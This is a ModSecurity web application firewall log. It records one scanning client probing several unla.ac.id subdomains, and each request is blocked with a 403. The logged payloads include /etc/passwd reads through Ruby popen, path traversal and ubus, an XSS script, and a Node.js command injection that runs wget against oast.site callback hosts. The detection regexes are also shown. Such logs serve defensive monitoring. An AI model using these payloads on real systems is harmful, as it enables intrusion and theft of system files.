[Tue Aug 29 11:44:13.411833 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAdftewAAAAG"]
[Tue Aug 29 11:44:13.418511 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAcsLRMAAAAE"]
[Tue Aug 29 11:44:13.440345 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAfcoPIAAAAa"]
[Tue Aug 29 11:44:14.385540 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAftVDUAAAAf"]
[Tue Aug 29 11:44:14.387536 2023] [:error] [pid 2041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAf53SkAAAAR"]
[Tue Aug 29 11:44:14.405450 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13nsCo-f0AAAftVDYAAAAf"]
[Tue Aug 29 11:44:14.419566 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAdftfEAAAAG"]
[Tue Aug 29 11:44:14.435062 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAdTBK8AAAAY"]
[Tue Aug 29 11:44:14.440636 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAenGfAAAAAM"]
[Tue Aug 29 11:44:15.477690 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13n8Co-f0AAAcsLRwAAAAE"]
[Tue Aug 29 11:44:16.363427 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26gwhzi3s1hw99r1.oast.site found within TX:1: cjmnbitjmimt14dgn26gwhzi3s1hw99r1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAdftfgAAAAG"]
[Tue Aug 29 11:44:16.413643 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26g7m7dyhd8hgcea.oast.site found within TX:1: cjmnbitjmimt14dgn26g7m7dyhd8hgcea.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAfky-MAAAAi"]
[Tue Aug 29 11:44:16.429714 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26gs4wgiowfckdd7.oast.site found within TX:1: cjmnbitjmimt14dgn26gs4wgiowfckdd7.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAdftfsAAAAG"]
[Tue Aug 29 11:44:16.451969 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26ggftjm7d91k5wn.oast.site found within TX:1: cjmnbitjmimt14dgn26ggftjm7d91k5wn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAenGfoAAAAM"]
[Tue Aug 29 11:44:16.547703 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26gox7q86jbfo8n9.oast.site found within TX:1: cjmnbitjmimt14dgn26gox7q86jbfo8n9.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAdTBLsAAAAY"]
[Tue Aug 29 11:44:17.478663 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26gpgednr58bnn9f.oast.site found within TX:1: cjmnbitjmimt14dgn26gpgednr58bnn9f.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13ocCo-f0AAAdxUdYAAAAC"]
[Tue Aug 29 11:44:18.406916 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13osCo-f0AAAfVkZgAAAAD"]
[Tue Aug 29 11:44:18.408030 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13osCo-f0AAAfWN1oAAAAL"]
[Tue Aug 29 11:44:18.427894 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13osCo-f0AAAfVkZkAAAAD"]
[Tue Aug 29 11:44:18.428762 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13osCo-f0AAAfWN1sAAAAL"]
[Tue Aug 29 11:44:19.380789 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13o8Co-f0AAAfZj34AAAAN"]
[Tue Aug 29 11:44:19.403692 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13o8Co-f0AAAfVkZwAAAAD"]
[Tue Aug 29 11:44:20.373122 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gm8o6hw8ahb86o.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAfiYmkAAAAg"]
[Tue Aug 29 11:44:20.387454 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gcbcrtkptoxefa.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAenGf0AAAAM"]
[Tue Aug 29 11:44:20.423589 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gtu7df5ebhzuyb.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAdxUeQAAAAC"]
[Tue Aug 29 11:44:20.448295 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gjt51ekbc85fsh.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAdQ3qkAAAAV"]
[Tue Aug 29 11:44:20.464070 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26ghz3wrj3h6rdig.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAfGacIAAAAT"]
[Tue Aug 29 11:44:21.373100 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gqmg9mdcx4dr3w.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13pcCo-f0AAAfSWawAAAAB"]
[Tue Aug 29 11:44:23.473245 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAdfth8AAAAG"]
[Tue Aug 29 11:44:23.564048 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAfcoP0AAAAa"]
